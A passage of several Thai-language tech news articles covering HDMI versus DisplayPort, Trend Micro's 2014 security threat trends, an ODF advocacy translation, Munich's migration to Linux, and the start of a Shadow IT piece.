(ใช้รีโมตทีวีควบคุมดีวีดีได้) แต่ DisplayPort มีขีดความสามารถที่จะทำได้ แต่ยังไม่ได้ทำ - DisplayPort ใช้ไฟน้อยกว่า - ทั้ง HDMI และ DisplayPort มี DRM ทั้งคู่ โดยใช้ชื่อว่า HDCP และ DPCP ตามลำดับ อย่างไรก็ตาม DisplayPort เวอร์ชัน 1.1 ขึ้นไปจะรองรับ HDCP ด้วย - ความยาวสายทั้งคู่สูงสุดที่ประมาณ 15 เมตร แต่ถ้าให้ได้ความสามารถสูงสุด HDMI ต้องไม่ยาวกว่า 5 เมตร และ DisplayPort ต้องไม่ยาวกว่า 3 เมตร - มาตรฐาน DisplayPort สามารถเปลี่ยนสายเป็นใยแก้วนำแสงได้ ซึ่งจะช่วยเพิ่มระยะของสายให้ไกลขึ้นได้ - HDMI รองรับมาตรฐานสี xvYCC ที่ DisplayPort ไม่รองรับ เป็นมาตรฐานสีที่มีใน HDTV ราคาแพงๆ ทั่วไป - HDMI มีค่าสิทธิ์สัญญาอนุญาตตามอุปกรณ์ที่ใช้อยู่ $0.04 ต่อชิ้น และต้องเสียค่ารายปีปีละ $10,000 ในขณะที่ DisplayPort สามารถผลิตได้ฟรี - ในทางเทคนิคแล้ว DisplayPort สามารถทำให้รองรับเป็น Single Link HDMI ได้ แต่ทำไม่ได้ในเชิงกฎหมาย - HDMI มีฐานอุปกรณ์ที่รองรับแล้วสูงกว่ามาก ในภาพรวมแล้ว DisplayPort ถือว่าเหนือกว่า HDMI ในเกือบทุกด้าน ในด้านหนึ่งก็เพราะ DisplayPort ถือว่าเป็นมาตรฐานที่ช้ากว่า HDMI อยู่ 3 - 4 ปี ซึ่งก็เป็นธรรมดาที่ของใหม่กว่าจะดีกว่าของเก่า และของเก่าจะมีฐานผู้ใช้และอุปกรณ์ที่รองรับมากกว่าของใหม่ อย่างไรก็ตามนักวิเคราะห์หลายๆ ที่ก็มองว่า HDMI และ DisplayPort ต่างมีที่อยู่ของมัน และไม่น่าจะมีใครมาตีใครให้ตายกันไปข้างหนึ่งได้ เพราะ HDMI เองก็ถูกออกแบบมาให้ใช้กับอุปกรณ์ A/V เป็นหลัก ในขณะที่ DisplayPort ก็ออกแบบมาเพื่อใช้กับ PC เป็นหลัก และเราคงจะเห็นอุปกรณ์ A/V ที่มี DisplayPort กับ PC ที่มี HDMI เฉพาะในตลาดระดับกลางขึ้นไปเท่านั้น อ้างอิง - Wikipedia ([HDMI](http://en.wikipedia.org/wiki/HDMI), [DisplayPort](http://en.wikipedia.org/wiki/DisplayPort)), [MaximumPC](http://www.maximumpc.com/article/the_myth_of_an_hdmi_displayport_standoff), [EDN](http://www.edn.com/article/CA6594089.html), [Bright Hub](http://www.brighthub.com/computing/hardware/articles/24782.aspx)
# [Blognone Quest] Trend Micro แนะนำ 8 แนวโน้มความเสี่ยงความปลอดภัยไอทีปี 2014 สรุปเนื้อหาจากงาน Blognone Quest for Modern Security ตอนที่สอง (ตอนที่หนึ่ง) โดยเป็นการบรรยายของคุณคงศักดิ์ ก่อตระกูล Technical Services Senior Manager จาก Trend Micro หัวข้อการบรรยายของคุณคงศักดิ์เป็นการแนะนำ "แนวโน้ม" ของปัญหาภัยคุกคามด้านความปลอดภัยที่เปลี่ยนแปลงไปจากอดีตอย่างมากด้วยสภาพตลาดเทคโนโลยีที่เปลี่ยนไป เช่น Internet of Everything (IoE) มีอุปกรณ์ชนิดใหม่ๆ ที่เชื่อมต่อกับอินเทอร์เน็ตเยอะขึ้นมาก แนวโน้มของภัยคุกคามรูปแบบต่างๆ มีดังนี้ **1) การยืนยันตัวตนสองชั้น (two-step verification) เริ่มไม่สามารถป้องกันภัยคุกคามแบบ man-in-the-middle ได้** ปัญหา man-in-the-middle หรือ "คนที่มาดักข้อมูลตรงกลาง" ไม่ใช่เรื่องใหม่ แต่รูปแบบเริ่มเปลี่ยนแปลงตามพฤติกรรมของผู้ใช้อินเทอร์เน็ตที่เริ่มใช้ mobile banking และยืนยันตัวตนด้วย SMS/OTP ปัญหาคือผู้บริโภคเข้าใจว่าการโอนเงินผ่านมือถือนั้น "ปลอดภัย" เพราะยืนยันตัวตนด้วย OTP แต่สิ่งที่เกิดขึ้นคือมัลแวร์ที่ดักจับ SMS OTP ที่ส่งมายังเครื่องเรา แล้วส่งต่อ SMS ไปยังเครื่องของแฮ็กเกอร์อีกทีหนึ่ง โดยที่ผู้บริโภคไม่รู้ตัวเลย ปัญหานี้มักพบใน Android เพราะกูเกิลมีกระบวนการตรวจสอบแอพที่ไม่เข้มงวดมากนัก **2) ปัญหาการโจมตีแบบเจาะจงเฉพาะจุดหรือเฉพาะองค์กร (targeted attack) เพิ่มมากขึ้น** ในอดีตการโจมตีเว็บไซต์ต่างๆ เป็นแบบหว่านหรือสุ่ม (เช่น สแกนพอร์ตเพื่อหาช่องโหว่) แต่ปัจจุบันรูปแบบการโจมตีเริ่มเปลี่ยนเป็นการสร้างไวรัสหรือมัลแวร์เพื่อเจาะองค์กรใดๆ เป็นพิเศษ โดยผู้โจมตีจะศึกษาระบบความปลอดภัยขององค์กรนั้นๆ ก่อนเพื่อปรับปรุงไวรัสให้มีประสิทธิภาพสูงขึ้น จากนั้นใช้วิธี social engineering หลอกผู้ใช้ให้ดาวน์โหลดมัลแวร์ด้วยวิธีการต่างๆ (เช่น ปลอมตัวเป็นไฟล์ PDF) เข้าไปขโมยข้อมูล ก่อนจะปิดฉากโดยการลบร่องรอย เช่น ลบ MBR ของวินโดวส์ทิ้ง **3) มัลแวร์เน้นเจาะแอพพลิเคชันแทนระบบปฏิบัติการ** แนวโน้มมัลแวร์ใหม่ๆ ไม่จ้องโจมตีระบบปฏิบัติการ เพราะไมโครซอฟท์ขยันออกแพตช์ แฮ็กเกอร์จึงพยายามหาช่องโหว่ผ่านแอพพลิเคชันที่ใช้บ่อยๆ (แต่ไม่ถูกจับตาเรื่องความปลอดภัยเท่ากับวินโดวส์ และออกแพตช์ไม่เร็วเท่ากับวินโดวส์) เช่น IE, Java, Adobe Flash/AIR, Firefox, Chrome, iTunes แอพพลิเคชันเหล่านี้จะเจอช่องโหว่น้อยกว่าวินโดวส์ แต่ก็มีข้อเสียคือแพตช์ออกช้ากว่ามาก **4) ข่าวข้อมูลหลุดรั่วครั้งใหญ่ (major data breach) จะเกิดขึ้นเฉลี่ยเดือนละครั้ง** เหตุผลที่ข้อมูลหลุดเยอะเพราะข้อมูลขายได้ แต่ในวงการแฮ็กเกอร์เองก็เริ่มเจอปัญหาว่าราคาข้อมูลตกลงจากเดิม ทำให้แฮ็กเกอร์เริ่มพยายามทำ analytics ข้อมูลที่ขโมยมาได้เพื่อจับคู่ข้อมูลส่วนบุคคลของผู้ใช้คนหนึ่งๆ เข้าด้วยกัน จะได้สามารถปลอมแปลงตัวเป็นบุคคลนั้นได้ง่ายขึ้น **5) พบบั๊กความปลอดภัยเพิ่มขึ้นจาก Windows XP และ Java 6 หมดอายุ** ซอฟต์แวร์สำคัญของตลาดองค์กรคือ Java 6 หมดอายุในปี 2013 และตามด้วย Windows XP หมดอายุในปี 2014 แต่องค์กรยังใช้ซอฟต์แวร์พวกนี้อยู่มาก จึงมีความเสี่ยงด้านความปลอดภัยสูงมาก อุปกรณ์สายเครื่อง ATM ใช้ Windows XP ส่วนใหญ่อยู่ในเครือข่ายปิดที่มีความปลอดภัยสูงกว่า แต่การคิดแบบนี้จะช่วยให้เราไม่ระมัดระวังเรื่องความปลอดภัยอย่างที่ควรจะเป็น นอกจากนี้ยังมีเครื่องจ่ายเงิน (POS), อุปกรณ์การแพทย์ และเครื่องจักรในโรงงาน ที่ได้รับผลกระทบจาก XP **6) เว็บใต้ดิน (Deep Web) ถูกใช้เป็นศูนย์กลางของอาชญากรรมไซเบอร์มากขึ้น** Deep Web หมายถึงเว็บใต้ดินที่ต้องรู้ URL หรือ IP เป๊ะๆ จึงจะเข้าได้ ตัวอย่างเว็บใต้ดินชื่อดังคือ [Silk Road ที่ถูกปิดไป](https://www.blognone.com/node/49386) แนวโน้มในปี 2014-2015 แฮ็กเกอร์จะใช้ Deep Web เป็นเครื่องมือในการก่ออาชญากรรมไซเบอร์มากขึ้น และทำให้ฝ่ายผู้รักษากฎหมายตามจับได้ยากกว่าเดิม **7) คนจะเริ่มไม่เชื่อใจในการติดตั้งระบบ MDM ขององค์กร** แนวโน้มเรื่อง BYOD นำอุปกรณ์ส่วนตัวมาใช้กับเครือข่ายในองค์กร เดิมทีองค์กรจำเป็นต้องติดตั้ง[ระบบ Mobile Device Management](https://www.blognone.com/node/54864) เพื่อเพิ่มความปลอดภัยต่อมือถือของพนักงาน มีการกำหนดนโยบายความปลอดภัยมากขึ้น (เช่น ต้องมีรหัสล็อคเครื่องเพื่อต่อ Wi-Fi องค์กร) สิ่งที่เกิดขึ้นในช่วงหลังคือพนักงานจะเริ่มไม่เชื่อใจระบบ MDM ขององค์กรที่รู้ข้อมูลทุกอย่างในมือถือส่วนตัวของตัวเอง และเริ่มเกิดความขัดแย้งระหว่าง security กับ privacy **8) จะเกิดไวรัสบน Internet of Everythings** ตอนนี้ยังไม่เกิดแต่น่าจะเกิดในอนาคต และส่งผลกระทบต่ออุปกรณ์กลุ่ม Internet of Everthing (IoE) ในวงกว้าง อุปกรณ์ที่มีความเสี่ยงสูงคืออุปกรณ์จ่ายเงินแบบ contactless (NFC) ที่วงการการเงินกำลังผลักดันให้เกิดขึ้นจริงมากขึ้นเรื่อยๆ เดิมทีใช้บัตรแตะ แต่ระยะหลังเริ่มใช้มือถือแตะได้ จึงมีโอกาสมีข้อมูลหลุดได้เยอะขึ้น
# บทความพิเศษ: ภาพถ่ายครอบครัวกับ ODF [Jonathan Schwartz](http://www.sun.com/aboutsun/executives/schwartz/bio.jsp) ประธานและซีอีโอของ Sun Microsystems ได้เขียนบล็อกเกี่ยวกับ OpenDocument โดยใช้วิธีเปรียบเทียบให้เข้าใจได้ง่าย ผมเห็นว่าบล็อกอันนี้มีประโยชน์และจะช่วยเผยแพร่ OpenDocument และแนวคิดด้านมาตรฐานเปิดในบ้านเรา เลยแปลมาให้อ่านกัน ร่วมกันโปรโมท OpenDocument โดยส่งเรื่องนี้ไปให้คนรู้จักของคุณอ่าน หรือใส่ลิงก์กลับมายังบล็อกนี้ในเว็บของคุณ ### ภาพถ่ายครอบครัวกับ ODF เมื่อสองสามปีก่อนตอนที่ผมกลับไปเยี่ยมบ้านพ่อแม่ ผมได้ไปรื้อภาพถ่ายครอบครัวสมัยก่อนที่เก็บในกล่องใส่รองเท้า ผมสนุกกับการดูรูปภาพเหล่านี้มาก จนกระทั่งผมนึกขึ้นมาได้ว่าภาพความทรงจำเหล่านี้มีเพียงอย่างละใบเท่านั้น มีแค่ไม่กี่รูปที่อัดสำรองไว้มากกว่าหนึ่ง ให้ตายสิ กล่องรองเท้ากล่องนั้นมันเก่ามากแล้ว ผมลองคิดเล่นๆ ว่าถ้าเกิดน้ำท่วมหรือไฟไหม้ขึ้นมาล่ะจะทำยังไง ผมอยากเก็บรูปภาพเหล่านี้ไว้ให้ลูกๆ ของผมดูว่าสมัยก่อนพ่อของพวกเขาหน้าตาแบบไหน และอยากส่งผ่านไปยังรุ่นหลานรุ่นเหลนของผมอีกด้วย ดังนั้นผมจึงทำตัวเป็นลูกชายที่ดี นำกล่องรองเท้านั้นกลับบ้าน สแกนรูปภาพทั้งหมดลงคอมพิวเตอร์ (และไม่ลืมเอากล่องนั้นไปคืน) ไฟล์รูปภาพถูกเก็บลงฮาร์ดดิสก์ในแล็ปท็อป ซึ่งผมมักจะวางมันไว้ในครัว แต่พอนึกถึงกิจกรรมในครัว ผมก็คิดว่ามันยังอันตรายอยู่ดีที่รูปจะหาย (มีโอกาสหายมากกว่าไว้ในกล่องรองเท้าด้วยซ้ำ) ผมทำสำเนาลงดีวีดี แยกเก็บไว้หลายแห่งตามที่ต่างๆ ภายในบ้าน รวมถึงแจกไปยังญาติพี่น้อง อย่างไรก็ตาม ระบบการบริหารจัดการที่ไม่เป็นมืออาชีพแบบนี้ไม่ประสบผลสำเร็จ สุดท้ายดีวีดีเกือบทั้งหมดจะหายไป! มีคนเคยพูดไว้ว่า "เครือข่ายนั่นแหละคือคอมพิวเตอร์" ผมเลยแก้ปัญหาโดยการอัพโหลดรูปทั้งหมดไปไว้บนอินเทอร์เน็ต วิธีคิดของผมคือถ้าคุณอยากเก็บอะไรซักอย่างไว้ในกล่องรองเท้า คุณก็ควรจะจ้างมืออาชีพดูแลกล่องรองเท้าของคนอื่นให้มาดูแลกล่องของคุณด้วย บริการเว็บฝากรูปก็เช่นกัน มันน่าจะเป็นสถานที่ที่ปลอดภัยที่สุดในโลกสำหรับเก็บรูปภาพก็ได้ แต่แล้วผมก็คิดต่อไปอีก... มีอะไรรับประกันไหมว่าบริการฝากรูปพวกนี้จะคงอยู่ตลอดไป และผมสามารถเรียกรูปภาพของผมมาดูใหม่ได้ในอีกห้าสิบปีข้างหน้า เทคโนโลยีเก็บรูปในอนาคตจะเป็นแบบไหน มันจะยังสามารถเปิดไฟล์แบบเก่าได้หรือไม่ นี่เป็นแค่ตัวอย่าง มาถึงตอนนี้คุณคงพอเห็นภาพแล้วว่าทำไม [Open Document Format](http://en.wikipedia.org/wiki/OpenDocument) เป็นเรื่องสำคัญ ลองสมมติตัวเองเป็น ส.ส. ที่ร่างกฎหมาย, หมอที่ต้องเขียนประวัติคนไข้ หรือนักเรียนที่ต้องเขียนเรียงความก็ได้ ถ้าอีกห้าสิบปีข้างหน้า คุณอยากกลับมาแก้เอกสารพวกนี้อีกครั้ง คุณยังสามารถทำได้หรือเปล่า? ลองคิดดูว่าถ้าบริษัทที่พัฒนาโปรแกรมสำหรับแก้ไขเอกสารเหล่านี้ล้มละลาย หายไปจากตลาด หรือบังคับให้คุณจ่ายเงิน 10,000 เหรียญสำหรับโปรแกรมที่เปิดไฟล์รุ่นเก่าได้ ตัวอย่างเหล่านี้สอนเราว่า **"เทคโนโลยีจะเปลี่ยนไปแค่ไหนก็ตาม ข้อมูลยังต้องคงอยู่"** แล้วเราจะทำอย่างไร? ข้อมูลที่คุณสร้างนั้น**เป็นของคุณ** ไม่ใช่ของบริษัทซอฟต์แวร์ คุณคงจะไม่อยากจ่ายเงินให้บริษัทผู้ผลิตกล้องทุกครั้งเวลาอยากดูรูปถ่ายของตัวเองหรอกนะ ความเสี่ยงพวกนี้เกิดจากการใช้โปรแกรมที่ไม่ทำตามมาตรฐานเปิด อย่าเพิ่งลืม "เทคโนโลยีจะเปลี่ยนไปแค่ไหนก็ตาม ข้อมูลยังต้องคงอยู่" นี่เป็นเหตุผลที่ทำให้[บริษัทไฮเทคจำนวนมาก](http://www.odfalliance.org/memberlist.php) และ[หน่วยงานภาครัฐบาลของหลายประเทศ](http://www.odfalliance.org/press/Release20061128.pdf) พัฒนา Open Document Format (หรือรู้จักกันในชื่อย่อว่า ODF) ขึ้นมา ODF เป็นมาตรฐานเอกสารแบบเปิด เป็นอิสระไม่ผูกติดกับโปรแกรมที่ใช้สร้างเอกสารของเจ้าใดเจ้าหนึ่ง ดังนั้นถ้าคุณเขียนประวัติคนไข้หรือเรียงความด้วยโปรแกรมเวิร์ดโพรเซสเซอร์ที่สนับสนุน ODF ในอีกห้าสิบปีข้างหน้าคุณจะยังสามารถเข้าถึงข้อมูลของคุณได้เสมอ ODF เป็น[มาตรฐานเปิดอย่างแท้จริง](http://blogs.sun.com/dennisding/resource/Open%20Standard%20Definition.pdf) ไม่ต้องเสียค่าลิขสิทธิ์ในการใช้งาน ปัจจุบันมีบริษัทซอฟต์แวร์จำนวนมากสนับสนุนการนำ ODF ไปใช้งาน ตัวอย่างเช่น ไอบีเอ็ม ซัน กูเกิล เรดแฮท หรือแม้แต่ไมโครซอฟท์เองก็เถอะ สำหรับธุรกิจที่มีนโยบายการเก็บรักษาเอกสารแล้ว ความคงทนของข้อมูลและฟอร์แมตไฟล์นั้นสำคัญกว่าตัวโปรแกรม (และพนักงาน) ที่สร้างเอกสารมาก นี่เป็นแนวคิดเดียวกับเรื่องการเก็บภาพในกล่องรองเท้า ในฐานะที่ผมเป็น CIO ของครอบครัว ผมต้องการให้ภาพพวกนั้นมีอายุยืนยาวกกว่าตัวผมอยู่แล้ว ตอนนี้เรากำลังทำงานร่วมกับกูเกิลในการแลกเปลี่ยนข้อมูลระหว่าง OpenOffice กับบริการออนไลน์ของกูเกิลโดยใช้ ODF เป็นสื่อกลาง เอกสารทุกฉบับที่สร้างด้วยชุดออฟฟิศออนไลน์ของกูเกิลจะสามารถนำมาใช้กับ OpenOffice ได้ โปรแกรมทั้งสองตัวช่วยรับประกันความเข้ากันได้ของเอกสารในระยะยาว ไม่จำกัดว่าเอกสารนั้นจะเป็นกฎหมาย สัญญา ประวัติคนไข้ ไดอารี หรือแผนธุรกิจ นี่รวมไปถึงสเปรดชีตและเอกสารนำเสนอด้วย สำหรับคนที่ไม่รู้จัก [OpenOffice](http://www.openoffice.org/) มันเป็นชุดโปรแกรมสำนักงานที่ทุกคนสามารถ[ดาวน์โหลด](http://download.openoffice.org/2.1.0/index.html)ได้ฟรี ปัจจุบันมีคนจากทั่วโลกดาวน์โหลดไปแล้วหลายร้อยล้านชุด ล่าสุดบริษัทไมโครซอฟท์ได้ประกาศสนับสนุน ODF ผ่านทางปลั๊กอิน ซึ่งคุณจะสามารถดาวน์โหลดได้ในเร็วๆ นี้ ปลั๊กอินตัวนี้จะช่วยให้ไมโครซอฟท์เวิร์ดสามารถอ่านและเขียนเอกสารในรูปแบบ ODF ได้ ไม่ว่าคุณจะเป็นนักเรียนมัธยมหรือบริษัทน้ำมันข้ามชาติก็ตาม คุณควรใช้ ODF เป็นฟอร์แมตเอกสารหลัก การใช้ ODF ช่วยให้โปรแกรมแบบโอเพนซอร์สและไม่เปิดซอร์สแลกเปลี่ยนข้อมูลข้ามกันได้อย่างราบรื่น เพราะนี่เป็นเรื่องของมาตรฐาน ไม่ใช่ในระดับเทคโนโลยีหรือผลิตภัณฑ์ใดๆ ถ้าคุณเป็นผู้บริหารองค์กรขนาดใหญ่ คุณอาจเลือกให้ส่วนงานที่ต้องติดต่อกับภายนอกใช้ไมโครซอฟท์เวิร์ดได้ต่อไป แต่ย้ายพนักงานส่วนอื่นไปใช้โปรแกรมที่รองรับ ODF ได้ดีกว่า (ไม่ว่าจะเป็น OpenOffice, ชุดออฟฟิสของกูเกิล หรือโปรแกรมอื่นๆ ก็ตาม) สิ่งที่ทำให้อินเทอร์เน็ตแพร่หลายคือระบบที่แตกต่างกันสามารถทำงานร่วมกันได้ ([interoperability](http://download.openoffice.org/2.1.0/index.html)) ในราคาที่ไม่แพงจนเกินไป ([affordability](http://www.amazon.com/Microsoft-Office-Professional-2007-VERSION/dp/B000HCVR30/sr=8-2/qid=1171346044/ref=pd_bbs_sr_2/103-7353799-3734217?ie=UTF8&s=software)) ในฐานะที่เรารู้จักและใช้งานจุดแข็งเหล่านี้เป็นอย่างดีแล้ว เราก็ควรเลือกระบบที่มีคุณลักษณะพวกนี้ไว้ใช้ในอนาคตเช่นกัน Jonathan Schwartz ประธานและ CEO บริษัท Sun Microsystems ([ต้นฉบับภาษาอังกฤษ](http://blogs.sun.com/jonathan/entry/microsoft_vista_microsoft_office_and)) ข้อมูลเพิ่มเติมเกี่ยวกับ ODF - [ข่าว Blognone ในแท็ก OpenDocument](http://www.blognone.com/topics/opendocument) - [วิกิพีเดียภาษาไทย](http://th.wikipedia.org/wiki/OpenDocument) - [ร่วมมือร่วมใจสู่มาตรฐานไฟล์แบบเปิด (1) : ปัญหา Vendor Lock-in](http://www.isriya.com/column/byteculture/26-opendocument) - [ร่วมมือร่วมใจสู่มาตรฐานไฟล์แบบเปิด (2) : OpenDocument](http://www.isriya.com/column/byteculture/27-opendocument2) - [ร่วมมือร่วมใจสู่มาตรฐานไฟล์แบบเปิด (3)](http://www.isriya.com/column/byteculture/28-opendocument3) - [รวมลิงก์และสถานะ ODF](http://www.isriya.com/opendocument)
# เมืองมิวนิกเปลี่ยนพีซี 15,000 เครื่องจากวินโดวส์เป็นลินุกซ์ได้อย่างไร เมืองมิวนิกเป็นตัวอย่างของการย้ายเครื่องจำนวนมากมาเป็นลินุกซ์ในครั้งเดียว โครงการนี้เริ่มมาตั้งแต่เป็นไอเดียในปี 2001 มาจนถึงคงทุกวันนี้ มีคอมพิวเตอร์ที่ย้ายมาแล้วถึง 15,000 เครื่อง นิตยสาร LinuxVoice รายงานถึงกระบวนการย้ายซอฟต์แวร์ขนาดใหญ่เช่นนี้ว่าทำได้อย่างไร ในปี 2001 ลินุกซ์ยังไม่พร้อมสำหรับการใช้งานเดสก์ทอปนัก ทั้ง Gnome และ KDE ต่างมีข้อจำกัดหลายอย่างเทียบกับวินโดวส์ แต่สมาชิกคณะกรรมการเมืองมิวนิก (Munich city council) คนหนึ่งก็ออกความเห็นว่าเป็นไปได้หรือไม่ที่จะหาซอฟต์แวร์มาแทนที่ซอฟต์แวร์ของไมโครซอฟท์ จากคำถามนี้ทางกรรมการเมืองได้ตั้งคณะทำงานขึ้นมาสำรวจความเป็นไปได้โดยศึกษาห้าหนทางของระบบไอที เช่น ไมโครซอฟท์ทั้งระบบ, วินโดวส์ร่วมกับ OpenOffice, ลินุกซ์ร่วมกับ OpenOffice และทางอื่นๆ จนเหลือเพียงสองตัวเลือก คือจะอยู่กับวินโดวส์ต่อไป และอัพเกรดระบบทั้งหมดไป Windows XP หรือจะย้ายไปลินุกซ์และใช้ซอฟต์แวร์โอเพนซอร์สทั้งหมด รายงานการศึกษาระบุชัดเจนแต่แรกว่าการใช้งานไมโครซอฟท์ทั้งชุดนั้นค่าใช้จ่ายถูกกว่า โดยรายงานรวมค่าบำรุงรักษา 5 ปี ค่าใช้จ่ายในการย้ายระบบ, ค่าทีมเทคนิคที่ซัพพอร์ต, และค่าฮาร์ดแวร์ แต่ความได้เปรียบสำคัญคือความปลอดภัย เมื่อมีการสอบถามไปยังไมโครซอฟท์ว่ามีซอฟต์แวร์ใดส่งข้อมูลกลับบริษัทบ้างหรือไม่ ไมโครซอฟท์กลับไม่สามารถตอบคำถามได้อย่างชัดเจน ในแง่ความโปร่งใสแล้วลินุกซ์จึงดีกว่ามาก ขณะเดียวกันนักการเมืองและพรรคการเมืองของเยอรมันเองก็ต้องการสนับสนุนบริษัทท้องถิ่นแทนที่จะส่งเงินไปยังบริษัทสหรัฐฯ อย่างไมโครซอฟท์ เสียงสนับสนุนเพิ่มเติมจึงมาจากเหตุผลที่ว่าการใช้ลินุกซ์จะช่วยอุตสาหกรรมไอทีท้องถิ่นและการซัพพอร์ตจะเป็นการจ่ายเงินให้บริษัทท้องถิ่นเอง กระบวนการศึกษาเริ่มชัดเจนในปี 2003 และกรรมการเมืองเตรียมจะโหวตว่าจะเปลี่ยนไปใช้ลินุกซ์หรือไม่ ปีนั้นสตีฟ บอลเมอร์ถึงกับบินไปเยอรมันเพื่อพบนายกเทศมนตรีเมืองมิวนิก แต่ผลที่ได้กลับตรงกันข้าม สมาชิกกรรมการเมืองคนหนึ่งถึงกับแสดงความไม่พอใจอย่างชัดเจน สุดท้ายเมื่อมีการโหวต กรรมการเมืองก็เลือกลินุกซ์ ทีมงานเริ่มวางระบบทดสอบในปี 2004 (สามปีหลังการศึกษาครั้งแรก) มีบริษัทเสนอโซลูชั่นเข้ามาถึงสิบบริษัทกับอีกหนึ่งกลุ่มบริษัทซึ่งชนะไปในที่สุด กลุ่มบริษัทนั้นคือ Gonicus และ Softcon ทั้งสองบริษัทให้คำปรึกษาขณะที่ทางกรรมการเมืองจ้างพนักงานเทคนิคเองอีก 13 คนมาทำงานในโครงการ LiMux เริ่มแรกโครงการ LiMux ใช้ Debian เวอร์ชั่นพิเศษที่ปรับแต่งเอง จากความเสถียร แต่ปรากฎว่าเมื่อทดสอบในปี 2006 กลับพบว่า Debian ทำงานกับฮาร์ดแวร์ใหม่ๆ ได้ไม่ดีนัก และรอบการออกรุ่นใหม่ของ Debian ก็ไม่ชัดเจนทำให้วางแผนระบบไอทีได้ยาก ทีมงานตัดสินใจเปลี่ยนมาใช้ Kubuntu ด้วยเหตุผลว่ามันมีหน้าตาคล้ายวินโดวส์เดิม และมีรอบการออกใหม่ที่ชัดเจนกว่า ข่าวร้ายคือผู้ใช้ส่วนมากไม่ยอมเปลี่ยนแม้หน้าจอจะคล้ายของเดิมแล้วก็ตาม ผู้ใช้บางคนบ่นกระทั่งสีของไอคอนที่เปลี่ยนไป ทีมงาน LiMux ต้องค่อยๆ ประชาสัมพันธ์โครงการไปเรื่อยๆ จัดประชุมสัมมนา รวมถึงจัด "โซนไร้ไมโครซอฟท์" ไว้ให้ผู้ใช้เข้ามาลองเล่นลินุกซ์กัน โดยมีเป้าหมายว่าให้ผู้ใช้ได้จับลินุกซ์ก่อนจะต้องใช้งานจริงสองปีล่วงหน้า LiMux รุ่นปัจจุบัน ส่วนรุ่นใหม่ที่กำลังอัพเกรดให้ผู้ใช้ในปีนี้ จะพัฒนาจาก Kubuntu 12.04 ปัญหาจริงที่พบมีตั้งแต่ปัญหาความเข้าใจ เช่น ผู้ใช้บางคนคิดว่าลินุกซ์ต้องพิมพ์แบบ command line เท่านั้น ผู้ใช้บางคนต้องใช้งานเอกสารในฟลอบปี้ดิสก์ ทีมงานก็ต้องสาธิตให้ดูว่าสามารถเปิดเอกสารเดิมมาใช้งานได้จริง การย้ายระบบนั้นแต่ละหน่วยงานเป็นผู้ย้ายระบบกันเองโดยไม่มีกำหนดเส้นตายชัดเจน เมื่อหน่วยงานใดตัดสินใจเริ่มย้ายระบบ ทีม LiMux ก็จะลงไปช่วยดูแลการย้าย ทีมงานพบว่าเครื่องวินโดวส์ที่จะย้ายข้อมูลออกมานั้นมีความต้องการมากกว่า 50 แบบ เมื่อการย้ายในหน่วยงานหนึ่งเสร็จ อีกหน่วยงานก็มักมีความต้องการต่างออกไป แต่โดยรวมเมื่อผู้ใช้มาใช้ LiMux กระบวนการซัพพอร์ตก็ง่ายขึ้น ทีมงานพัฒนาสามารถออกรุ่นใหม่ และให้ความช่วยเหลือได้ง่ายขึ้น เพราะพื้นฐานทุกเครื่องเป็น LiMux เหมือนกันหมด กราฟจำนวนเครื่องที่ย้ายมาใช้ LiMux ในปี 2012 เพียงปีเดียวจากเครื่องใช้ LiMux 9,000 เครื่องเพิ่มเป็น 15,000 เครื่องในช่วงสิ้นปี แม้ว่าเหตุผลหลักที่เลือกลินุกซ์จะไม่ใช่เพื่อประหยัดงบประมาณ แต่ทีมงานก็ออกรายงานเปรียบเทียบว่าการใช้ลินุกซ์กับการย้ายไป Windows XP ในตอนนั้นมีค่าใช้จ่ายต่างกันอย่างไร และสรุปผลว่างบประมาณทั้งหมดประหยัดไป 10 ล้านยูโร ขณะที่เอชพีเคยออกรายงานระบุว่าการที่เมืองมิวนิกย้ายมาใช้ลินุกซ์นี้มีค่าใช้จ่ายถึง 60 ล้านยูโร และจะเสียค่าใช้จ่ายเพียง 17 ล้านยูโรหากใช้ Windows XP ทีมงาน LiMux ติดต่อเอชพีเพื่อขอกระบวนการคำนวณแต่กลับไม่ได้รับคำตอบที่ชัดเจน ความสำเร็จของเมืองมิวนิกประกอบไปด้วยหลายส่วนประกอบกัน ความพยายามเลียนแบบเมืองมิวนิกในยุโรปกลับล้มเหลวหลายครั้ง เช่น Wienux สำหรับเมืองเวียนนา กลับไม่ได้รับการสนับสนุนจากฝ่ายการเมืองเท่าที่ควร หัวหน้าโครงการ LiMux ระบุว่าโครงการระดับนี้ต้องการรับการสนับสนุนจากฝ่ายการเมืองส่วนใหญ่ ไม่ใช่เพียงกลุ่มที่เข้าใจเหตุผลทางเทคนิคไม่กี่คน **หมายเหตุ:** บทความนี้แปลและเรียบเรียงจาก บทความ ["The Big Switch" นิตยสาร LinuxVoice ฉบับพฤษภาคม 2014](http://www.linuxvoice.com/the-big-switch/) ทาง LinuxVoice ระบุให้บทความนี้เป็นสัญญาอนุญาต [Creative Commons (BY-SA)](http://creativecommons.org/licenses/by-sa/4.0/)
# Shadow IT ปัญหาระบบไอทีลับในองค์กร จากกรณีอีเมลของ Hillary Clinton ในช่วงนี้ที่กระแสการเลือกตั้งประธานาธิบดีสหรัฐอเมริกากำลังมาแรง Hillary Clinton หนึ่งในผู้สมัครจากพรรคเดโมแครต กลับถูกโจมตีจากสาธารณะอย่างมาก โดยเฉพาะในประเด็นเรื่องของการตั้งและใช้อีเมลส่วนตัว เพื่อใช้ในการสื่อสารข้อมูลที่เป็นทางการ ขณะดำรงตำแหน่งเป็นรัฐมนตรีว่าการกระทรวงการต่างประเทศของสหรัฐฯ ([ข่าวเก่า](https://www.blognone.com/node/66677)) ซึ่งผู้ตรวจการประจำกระทรวง ออกมาระบุแล้วว่าเป็นการ[ละเมิดระเบียบของรัฐบาลกลาง](https://www.blognone.com/node/81426) แม้จะเป็นประเด็นเรื่องการเมือง แต่การใช้อีเมลของ Clinton ในลักษณะนี้กลับสะท้อนถึงปัญหาการใช้ระบบหรือโครงสร้างไอที ซึ่งทำกันเองหรือองค์กรไม่ได้อนุญาต ที่เรียกว่า “Shadow IT” ซึ่งเป็นประเด็นใหญ่ของบทความชิ้นนี้ บทความชิ้นนี้พยายามจะนำเสนอถึงปัญหาของ “Shadow IT” ว่าเป็นอย่างไร มีผลกระทบอย่างไร และควรจัดการอย่างไรครับ **กรณี Clinton ไม่ใช่แค่เอาอุปกรณ์ส่วนตัวมาใช้ แต่สร้างระบบใหม่ใช้คู่ขนาน** กระแสเรื่องของการนำเอาอุปกรณ์ส่วนตัวมาใช้ในที่ทำงาน (BYOD: Bring Your Own Device) 